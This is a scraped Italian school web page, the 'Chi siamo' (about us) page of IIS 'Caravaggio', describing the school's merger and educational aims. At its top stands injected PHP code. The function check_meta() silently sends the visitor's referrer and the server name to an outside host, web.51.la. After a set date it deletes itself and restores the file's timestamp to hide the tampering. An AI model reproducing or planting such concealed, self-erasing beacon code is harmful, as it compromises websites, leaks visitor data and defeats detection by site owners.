check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Chi siamo
Get Adobe Flash player

Nuovo sito

nuovosito 1

Chi siamo

 
PIU' SCUOLE IN UNA - UNA NUOVA SCUOLA IN UNA SCUOLA NUOVA
 
 
L’attuale Istituto d'Istruzione Superiore Statale "Caravaggio" è frutto della fusione tra scuole diverse per indirizzo ma coerenti nei princìpi educativi: l’ex Liceo Artistico Statale "Mario Mafai" e l’Istituto d'Istruzione Superiore Statale "Ilaria Alpi", che comprende il Liceo Scientifico e l’Istituto Tecnico Commerciale a indirizzo amministrazione, finanza e marketing. Dal 1 settembre, infine, si è unito lo storico Istituto d'Arte Roma1, portando con sé tutta la tradizione creativa e laboratoriale accumulata in decenni.
Da quest'anno, dunque, il Mafai e l'ISA1 si sono intrecciati in un unico, multiforme e vivace, Liceo artistico.  
 
          Quattro anime in una, dunque, ma non per questo disomogenee e disarticolate. Riteniamo, anzi, che la diversità in questo caso dia ottimi frutti. Vediamo come.
          I nostri corsi di studi vogliono formare, innanzi tutto, cittadini consapevoli e capaci, consci delle proprie attitudini e aspirazioni, educati alla convivenza, alla tolleranza e intenzionati a progettare la propria vita personale e professionale.
          All’attuazione di questo fine concorrono a pieno titolo sia il liceo artistico – che stimola la creatività riconducendola nell’alveo della crescita espressiva responsabile e produttiva -, sia quello scientifico – che forma giovani alla fiducia sia nella cultura che nella scienza -, sia infine l’indirizzo commerciale, che intende crescere ragazzi capaci e pronti nell’ambito della cultura e della sperimentazione tecnica.
 
          Al di là delle singole caratteristiche educative, tuttavia, per ogni corso di studi il nostro istituto intende prima di tutto garantire:
 
una scuola stimolante, piacevole e protettiva;
un gruppo di docenti attenti e responsabili;
un’educazione umanistica e creativa, che stimoli le attitudini personali e le capacità pratiche;
la costruzione di un’identità personale e sociale.
 
In questo senso l’unione non può che generare la forza. Poiché al rigore della formazione umanistico-scientifica, si unisce il positivo pragmatismo di tipo tecnico e, infine, l’apporto della energica creatività artistica.